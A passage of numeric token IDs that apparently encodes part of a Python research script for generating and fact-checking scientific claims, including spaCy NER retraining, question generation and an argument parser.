1506,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
17311,
796,
685,
49464,
1343,
705,
705,
1343,
9093,
17816,
5239,
20520,
329,
269,
17602,
11,
9093,
287,
19974,
7,
1069,
12629,
17816,
27568,
62,
25652,
6,
4357,
6096,
17816,
41484,
6,
12962,
60,
198,
220,
220,
220,
220,
220,
220,
220,
6670,
796,
685,
7061,
60,
1635,
18896,
7,
15414,
82,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
17311,
796,
685,
80,
1343,
705,
705,
1343,
257,
329,
10662,
11,
64,
287,
19974,
7,
1069,
12629,
17816,
25652,
6,
4357,
6096,
17816,
41484,
6,
12962,
60,
198,
220,
220,
220,
220,
220,
220,
220,
6670,
796,
685,
64,
329,
257,
287,
6096,
17816,
36590,
6122,
62,
41484,
6,
11907,
198,
220,
220,
220,
2746,
62,
15414,
82,
796,
11241,
7509,
7,
15414,
82,
11,
3509,
62,
13664,
28,
30001,
7509,
13,
19849,
62,
9806,
62,
13664,
11,
40122,
341,
28,
17821,
8,
628,
220,
220,
220,
1303,
31122,
262,
11241,
7509,
329,
6670,
198,
220,
220,
220,
351,
11241,
7509,
13,
292,
62,
16793,
62,
30001,
7509,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
14722,
796,
11241,
7509,
7,
83,
853,
1039,
11,
3509,
62,
13664,
28,
30001,
7509,
13,
19849,
62,
9806,
62,
13664,
11,
40122,
341,
28,
17821,
8,
628,
220,
220,
220,
2746,
62,
15414,
82,
14692,
23912,
1424,
8973,
796,
14722,
14692,
15414,
62,
2340,
8973,
198,
220,
220,
220,
1441,
2746,
62,
15414,
82,
628,
198,
4299,
3297,
62,
16072,
62,
6604,
82,
7,
28764,
82,
11,
2656,
62,
6604,
82,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
44654,
1123,
1624,
1262,
262,
10451,
25,
198,
220,
220,
220,
32382,
264,
796,
279,
58,
11284,
60,
532,
279,
58,
3642,
6335,
713,
60,
32382,
198,
220,
220,
220,
16409,
262,
3667,
23243,
416,
428,
4776,
287,
31491,
1502,
198,
220,
220,
220,
1058,
17143,
2747,
82,
25,
383,
8246,
2604,
896,
422,
2547,
6111,
41,
1563,
17633,
329,
1123,
2370,
6291,
329,
1123,
1624,
198,
220,
220,
220,
1058,
17143,
2656,
62,
6604,
82,
25,
383,
2656,
7560,
3667,
198,
220,
220,
220,
1058,
7783,
25,
311,
9741,
3667,
351,
511,
1109,
10627,
4776,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1796,
62,
6604,
62,
8899,
796,
1391,
66,
17816,
312,
6,
5974,
269,
329,
269,
287,
2656,
62,
6604,
82,
92,
198,
220,
220,
220,
329,
279,
287,
2747,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
477,
62,
1676,
1443,
796,
685,
4215,
9806,
7,
79,
17816,
46817,
6,
7131,
68,
7131,
6,
26675,
6,
12962,
329,
304,
287,
279,
17816,
46817,
6,
11907,
198,
220,
220,
220,
220,
220,
220,
220,
4776,
796,
3509,
7,
79,
58,
16,
60,
532,
279,
58,
17,
60,
329,
279,
287,
477,
62,
1676,
1443,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1796,
62,
6604,
62,
8899,
58,
79,
17816,
312,
20520,
7131,
6,
26675,
20520,
796,
4776,
628,
220,
220,
220,
1441,
1351,
7,
82,
9741,
26933,
85,
329,
410,
287,
1796,
62,
6604,
62,
8899,
13,
27160,
3419,
4357,
1994,
28,
50033,
2124,
25,
2124,
17816,
26675,
6,
4357,
9575,
28,
17821,
4008,
628,
198,
4299,
3613,
62,
1008,
62,
19849,
7,
22915,
62,
15908,
11,
299,
34431,
11,
649,
62,
19849,
62,
3672,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
12793,
257,
599,
1590,
2746,
198,
220,
220,
220,
1058,
17143,
5072,
62,
15908,
25,
6350,
284,
3613,
262,
2746,
198,
220,
220,
220,
1058,
17143,
299,
34431,
25,
383,
629,
8802,
1590,
2746,
284,
3613,
198,
220,
220,
220,
1058,
17143,
649,
62,
19849,
62,
3672,
25,
968,
1438,
329,
262,
599,
1590,
2746,
198,
220,
220,
220,
1058,
7783,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
5072,
62,
15908,
796,
277,
6,
1008,
62,
27530,
14,
90,
22915,
62,
15908,
92,
6,
198,
220,
220,
220,
611,
5072,
62,
15908,
318,
407,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
611,
407,
28686,
13,
6978,
13,
1069,
1023,
7,
22915,
62,
15908,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28686,
13,
76,
4335,
17062,
7,
22915,
62,
15908,
8,
198,
220,
220,
220,
220,
220,
220,
220,
299,
34431,
13,
28961,
14692,
3672,
8973,
796,
649,
62,
19849,
62,
3672,
198,
220,
220,
220,
220,
220,
220,
220,
299,
34431,
13,
1462,
62,
39531,
7,
22915,
62,
15908,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
50,
9586,
2746,
284,
1600,
5072,
62,
15908,
8,
628,
198,
4299,
651,
62,
13190,
62,
298,
871,
7,
47992,
1817,
11,
299,
34431,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
29677,
3706,
12066,
422,
257,
900,
286,
15433,
1817,
198,
220,
220,
220,
1058,
17143,
15433,
1817,
25,
198,
220,
220,
220,
1058,
17143,
299,
34431,
25,
198,
220,
220,
220,
1058,
7783,
25,
7343,
286,
8633,
82,
7268,
5128,
284,
1808,
5270,
2746,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1808,
62,
5235,
62,
15414,
796,
4277,
11600,
7,
4868,
8,
198,
220,
220,
220,
329,
15433,
590,
62,
11600,
287,
256,
80,
36020,
7,
47992,
1817,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
15433,
590,
796,
15433,
590,
62,
11600,
17816,
5239,
20520,
611,
705,
5239,
6,
287,
15433,
590,
62,
11600,
2073,
15433,
590,
62,
11600,
17816,
6604,
82,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
12066,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
9312,
62,
5239,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
2205,
796,
299,
34431,
7,
66,
42942,
8,
198,
220,
220,
220,
220,
220,
220,
220,
12066,
13,
2302,
437,
7,
4868,
7,
15390,
13,
658,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
9312,
62,
5239,
13,
2302,
437,
26933,
68,
13,
5239,
329,
304,
287,
2205,
13,
658,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
329,
920,
287,
12066,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7429,
796,
685,
90,
6,
5239,
10354,
920,
13,
5239,
11,
705,
4906,
10354,
920,
13,
18242,
62,
11,
705,
9688,
10354,
920,
13,
9688,
62,
10641,
11,
705,
1930,
10354,
685,
83,
13,
1930,
62,
329,
256,
287,
920,
48999,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
705,
15390,
62,
312,
6,
287,
15433,
590,
62,
11600,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6291,
796,
1391,
6,
312,
10354,
15433,
590,
62,
11600,
17816,
15390,
62,
312,
6,
4357,
705,
20189,
62,
312,
10354,
15433,
590,
62,
11600,
17816,
20189,
62,
312,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22866,
10354,
15433,
590,
62,
11600,
17816,
22866,
6,
4357,
705,
66,
42942,
10354,
15433,
590,
11,
705,
504,
86,
364,
10354,
7429,
11,
705,
25652,
10354,
705,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46817,
10354,
15433,
590,
62,
11600,
17816,
46817,
20520,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6291,
796,
1391,
6,
312,
10354,
705,
3256,
705,
20189,
62,
312,
10354,
705,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22866,
10354,
15433,
590,
62,
11600,
17816,
22866,
6,
4357,
705,
66,
42942,
10354,
15433,
590,
11,
705,
504,
86,
364,
10354,
7429,
11,
705,
25652,
10354,
705,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46817,
10354,
10148,
92,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
479,
287,
6291,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1808,
62,
5235,
62,
15414,
58,
74,
4083,
33295,
7,
39873,
58,
74,
12962,
198,
220,
220,
220,
1441,
1808,
62,
5235,
62,
15414,
628,
198,
4299,
1057,
62,
25652,
62,
20158,
7,
2213,
10613,
11,
288,
2617,
11,
2746,
11,
11241,
7509,
11,
3335,
11,
997,
62,
1350,
4105,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
2980,
378,
257,
900,
286,
2683,
422,
257,
2723,
2420,
290,
1351,
286,
7429,
357,
13190,
12066,
8,
198,
220,
220,
220,
1058,
17143,
21997,
25,
12905,
2667,
32388,
21997,
198,
220,
220,
220,
1058,
17143,
288,
2617,
25,
383,
27039,
284,
7716,
2683,
422,
198,
220,
220,
220,
1058,
17143,
2746,
25,
18233,
5270,
2746,
198,
220,
220,
220,
1058,
17143,
11241,
7509,
25,
29130,
7509,
329,
262,
2810,
2746,
198,
220,
220,
220,
1058,
17143,
3335,
25,
28034,
3335,
284,
1057,
319,
198,
220,
220,
220,
1058,
17143,
997,
62,
1350,
4105,
25,
7913,
286,
26741,
329,
15584,
2989,
198,
220,
220,
220,
1058,
7783,
25,
317,
1351,
286,
8633,
82,
7268,
5128,
284,
262,
1624,
5270,
2746,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
288,
75,
796,
21997,
13,
1136,
62,
9288,
62,
67,
10254,
1170,
263,
7,
67,
2617,
8,
198,
220,
220,
220,
477,
62,
82,
12629,
796,
17635,
198,
220,
220,
220,
329,
275,
287,
256,
80,
36020,
7,
25404,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
5128,
62,
2340,
796,
275,
17816,
15414,
62,
2340,
6,
4083,
1462,
7,
25202,
8,
198,
220,
220,
220,
220,
220,
220,
220,
8405,
796,
2746,
13,
8612,
378,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5128,
62,
2340,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
997,
62,
1350,
4105,
28,
22510,
62,
1350,
4105,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
13664,
28,
30001,
7509,
13,
19849,
62,
9806,
62,
13664,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1903,
62,
301,
33307,
28,
17821,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
477,
62,
82,
12629,
13,
2302,
437,
7,
4868,
7,
82,
12629,
13,
15255,
620,
22446,
36166,
22446,
77,
32152,
3419,
4008,
198,
220,
220,
220,
1624,
62,
5235,
62,
15414,
796,
4277,
11600,
7,
4868,
8,
198,
220,
220,
220,
329,
4686,
11,
369,
11,
9093,
11,
10662,
11,
15433,
590,
11,
3348,
62,
312,
11,
2370,
287,
19974,
7,
67,
2617,
17816,
312,
6,
4357,
288,
2617,
17816,
22866,
6,
4357,
288,
2617,
17816,
504,
86,
364,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
477,
62,
82,
12629,
11,
288,
2617,
17816,
66,
42942,
6,
4357,
288,
2617,
17816,
20189,
62,
312,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
2617,
17816,
46817,
20520,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
2429,
62,
25652,
796,
11241,
7509,
13,
12501,
1098,
7,
80,
11,
14267,
62,
20887,
62,
83,
482,
641,
28,
17821,
11,
3424,
62,
929,
62,
30001,
1634,
62,
2777,
2114,
28,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
6291,
796,
1391,
6,
312,
10354,
4686,
11,
705,
20189,
62,
312,
10354,
3348,
62,
312,
11,
705,
22866,
10354,
369,
11,
705,
41484,
10354,
9093,
58,
15,
4357,
705,
27568,
62,
25652,
10354,
2429,
62,
25652,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
42942,
10354,
15433,
590,
11,
705,
46817,
10354,
2370,
92,
198,
220,
220,
220,
220,
220,
220,
220,
329,
479,
287,
6291,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1624,
62,
5235,
62,
15414,
58,
74,
4083,
33295,
7,
39873,
58,
74,
12962,
628,
220,
220,
220,
1441,
1624,
62,
5235,
62,
15414,
628,
198,
4299,
1057,
62,
6604,
62,
20158,
7,
2213,
10613,
11,
288,
2617,
11,
2746,
11,
11241,
7509,
11,
3335,
11,
997,
62,
1350,
4105,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
2980,
378,
257,
900,
286,
3667,
422,
257,
1808,
290,
1351,
286,
7429,
357,
13190,
12066,
8,
198,
220,
220,
220,
1058,
17143,
21997,
25,
12905,
2667,
32388,
21997,
198,
220,
220,
220,
1058,
17143,
288,
2617,
25,
383,
27039,
284,
7716,
3667,
422,
198,
220,
220,
220,
1058,
17143,
2746,
25,
22070,
5270,
2746,
198,
220,
220,
220,
1058,
17143,
11241,
7509,
25,
29130,
7509,
329,
262,
2810,
2746,
198,
220,
220,
220,
1058,
17143,
3335,
25,
28034,
3335,
284,
1057,
319,
198,
220,
220,
220,
1058,
17143,
997,
62,
1350,
4105,
25,
7913,
286,
26741,
329,
15584,
2989,
198,
220,
220,
220,
1058,
7783,
25,
317,
1351,
286,
8633,
82,
7268,
262,
7560,
3667,
290,
257,
1351,
286,
8633,
82,
7268,
262,
5128,
284,
7097,
1109,
198,
220,
220,
220,
10627,
2746,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
288,
75,
796,
21997,
13,
1136,
62,
9288,
62,
67,
10254,
1170,
263,
7,
67,
2617,
8,
198,
220,
220,
220,
477,
62,
82,
12629,
796,
17635,
198,
220,
220,
220,
329,
275,
287,
256,
80,
36020,
7,
25404,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
5128,
62,
2340,
796,
275,
17816,
15414,
62,
2340,
6,
4083,
1462,
7,
25202,
8,
198,
220,
220,
220,
220,
220,
220,
220,
8405,
796,
2746,
13,
8612,
378,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5128,
62,
2340,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
997,
62,
1350,
4105,
28,
22510,
62,
1350,
4105,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
13664,
28,
30001,
7509,
13,
19849,
62,
9806,
62,
13664,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1903,
62,
301,
33307,
28,
17821,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
477,
62,
82,
12629,
13,
2302,
437,
7,
4868,
7,
82,
12629,
13,
15255,
620,
22446,
36166,
22446,
77,
32152,
3419,
4008,
628,
220,
220,
220,
7560,
62,
6604,
82,
796,
17635,
198,
220,
220,
220,
277,
66,
62,
6604,
62,
15414,
82,
796,
17635,
198,
220,
220,
220,
954,
796,
4277,
11600,
7,
600,
8,
198,
220,
220,
220,
329,
4686,
11,
369,
11,
9093,
11,
10662,
11,
1624,
11,
15433,
590,
11,
3348,
62,
312,
11,
2370,
287,
19974,
7,
67,
2617,
17816,
312,
6,
4357,
288,
2617,
17816,
22866,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
2617,
17816,
41484,
6,
4357,
288,
2617,
17816,
27568,
62,
25652,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
477,
62,
82,
12629,
11,
288,
2617,
17816,
66,
42942,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
2617,
17816,
20189,
62,
312,
6,
4357,
288,
2617,
17816,
46817,
20520,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
2429,
62,
6604,
796,
11241,
7509,
13,
12501,
1098,
7,
6604,
11,
14267,
62,
20887,
62,
83,
482,
641,
28,
17821,
11,
3424,
62,
929,
62,
30001,
1634,
62,
2777,
2114,
28,
25101,
8,
198,
220,
220,
220,
220,
220,
220,
220,
299,
796,
954,
58,
312,
60,
198,
220,
220,
220,
220,
220,
220,
220,
7560,
62,
6604,
82,
13,
33295,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1391,
6,
312,
10354,
277,
1,
90,
312,
92,
23330,
77,
92,
1600,
705,
20189,
62,
312,
10354,
3348,
62,
312,
11,
705,
22866,
10354,
369,
11,
705,
66,
42942,
10354,
15433,
590,
11,
705,
41484,
10354,
9093,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
27568,
62,
25652,
10354,
10662,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
27568,
62,
6604,
10354,
2429,
62,
6604,
11,
705,
46817,
10354,
2370,
30072,
198,
220,
220,
220,
220,
220,
220,
220,
277,
66,
62,
6604,
62,
15414,
82,
13,
33295,
15090,
6,
312,
10354,
277,
1,
90,
312,
92,
23330,
77,
92,
1600,
705,
6604,
10354,
2429,
62,
6604,
11,
705,
46817,
10354,
1391,
5512,
705,
66,
863,
62,
15390,
62,
2340,
10354,
2370,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
1186,
28130,
62,
15390,
62,
2340,
10354,
2370,
30072,
198,
220,
220,
220,
220,
220,
220,
220,
954,
58,
312,
60,
15853,
352,
198,
220,
220,
220,
1441,
7560,
62,
6604,
82,
11,
277,
66,
62,
6604,
62,
15414,
82,
628,
198,
4299,
1005,
3201,
62,
1008,
62,
19849,
7,
1008,
62,
7890,
11,
299,
34431,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
5660,
399,
1137,
3047,
3599,
422,
257,
1813,
599,
1590,
2746,
198,
220,
220,
220,
1058,
17143,
17156,
62,
7890,
25,
399,
1137,
3047,
1366,
198,
220,
220,
220,
1058,
17143,
299,
34431,
25,
1338,
1590,
2746,
284,
923,
422,
198,
220,
220,
220,
1058,
7783,
25,
833,
1328,
599,
1590,
2746,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
3601,
7,
11925,
7,
1008,
62,
7890,
4008,
198,
220,
220,
220,
4738,
13,
1477,
18137,
7,
1008,
62,
7890,
8,
198,
220,
220,
220,
399,
796,
493,
7,
15,
13,
23,
9,
11925,
7,
1008,
62,
7890,
4008,
198,
220,
220,
220,
1303,
11041,
1160,
4,
329,
21201,
198,
220,
220,
220,
17156,
62,
34409,
62,
7890,
796,
17156,
62,
7890,
58,
25,
45,
60,
198,
220,
220,
220,
17156,
62,
12102,
341,
62,
7890,
796,
17156,
62,
7890,
58,
45,
47715,
628,
220,
220,
220,
12656,
62,
1069,
11755,
796,
14631,
1008,
1600,
366,
2213,
69,
62,
4775,
21749,
2189,
1600,
366,
2213,
69,
62,
83,
482,
17,
35138,
8973,
198,
220,
220,
220,
35290,
62,
79,
18636,
796,
685,
34360,
329,
12656,
287,
299,
34431,
13,
34360,
62,
14933,
611,
12656,
407,
287,
12656,
62,
1069,
11755,
60,
198,
220,
220,
220,
1266,
62,
69,
796,
657,
13,
15,
198,
220,
220,
220,
16336,
796,
838,
198,
220,
220,
220,
279,
24588,
796,
657,
198,
220,
220,
220,
351,
299,
34431,
13,
40223,
62,
79,
18636,
46491,
403,
43958,
62,
79,
18636,
2599,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
13614,
329,
1802,
34820,
266,
14,
1903,
12225,
198,
220,
220,
220,
220,
220,
220,
220,
329,
24415,
287,
2837,
7,
3064,
2599,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
427,
84,
3046,
1359,
6096,
220,
878,
790,
24415,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4738,
13,
1477,
18137,
7,
1008,
62,
34409,
62,
7890,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9089,
796,
23884,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
15458,
510,
262,
6096,
1262,
41900,
20418,
338,
949,
571,
963,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
37830,
796,
949,
571,
963,
7,
1008,
62,
34409,
62,
7890,
11,
2546,
28,
5589,
9969,
7,
19,
13,
15,
11,
3933,
13,
15,
11,
352,
13,
8298,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
15458,
287,
37830,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5239,
82,
11,
37647,
796,
19974,
46491,
43501,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
299,
34431,
13,
19119,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15458,
11,
220,
1303,
15458,
286,
37647,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4268,
28,
15,
13,
16,
11,
220,
1303,
4268,
448,
532,
787,
340,
7069,
284,
16181,
786,
1366,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9089,
28,
22462,
274,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
4798,
7203,
43,
793,
274,
1600,
9089,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
3497,
21201,
8198,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
277,
16,
796,
299,
34431,
13,
49786,
7,
1008,
62,
12102,
341,
62,
7890,
8,
17816,
658,
62,
69,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7,
69,
1,
36,
2100,
277,
16,
25,
1391,
69,
16,
92,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
277,
16,
1875,
1266,
62,
69,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1266,
62,
69,
796,
277,
16,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3613,
62,
1008,
62,
19849,
7203,
22019,
1173,
14452,
62,
40684,
1600,
299,
34431,
11,
366,
565,
12,
19849,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
279,
24588,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
279,
24588,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
279,
24588,
6624,
16336,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
628,
220,
220,
220,
1441,
599,
1590,
13,
2220,
7203,
1008,
62,
27530,
14,
22019,
1173,
14452,
62,
40684,
4943,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
30751,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
27432,
62,
47992,
1817,
1600,
1037,
2625,
14749,
286,
262,
15433,
590,
1366,
1600,
2672,
28,
17821,
11,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
2100,
62,
47992,
1817,
1600,
1037,
2625,
14749,
286,
262,
21201,
15433,
590,
1366,
1600,
2672,
28,
17821,
11,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
9288,
62,
47992,
1817,
1600,
1037,
2625,
14749,
286,
262,
1332,
15433,
590,
1366,
1600,
2672,
28,
17821,
11,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
80,
70,
62,
19849,
62,
3672,
1600,
1037,
2625,
5376,
286,
262,
2746,
284,
779,
329,
1808,
5270,
1600,
2672,
28,
17821,
11,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
80,
17,
66,
62,
19849,
62,
3672,
1600,
1037,
2625,
5376,
286,
262,
2746,
284,
779,
329,
1808,
5270,
1600,
2672,
28,
17821,
11,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
16072,
62,
19849,
62,
3672,
1600,
1037,
2625,
5376,
286,
262,
1109,
10627,
2746,
1600,
2672,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4277,
11639,
305,
4835,
64,
12,
11664,
11537,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
16072,
62,
19849,
62,
9122,
4122,
1600,
1037,
2625,
5376,
286,
262,
1109,
10627,
2746,
1600,
2672,
28,
25101,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4277,
28,
14202,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
22615,
62,
10215,
79,
385,
62,
7753,
1600,
1037,
2625,
46785,
35789,
2393,
1600,
2672,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
32538,
62,
10215,
79,
385,
62,
7753,
1600,
1037,
2625,
6395,
23549,
422,
15433,
590,
4963,
1600,
2672,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2099,
28,
2536,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
28826,
1600,
1037,
2625,
29531,
9403,
1600,
2099,
28,
600,
11,
4277,
28,
12825,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
22510,
62,
1350,
4105,
1600,
1037,
2625,
15057,
286,
26741,
329,
15584,
2989,
1600,
2099,
28,
600,
11,
4277,
28,
16,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
22915,
62,
15908,
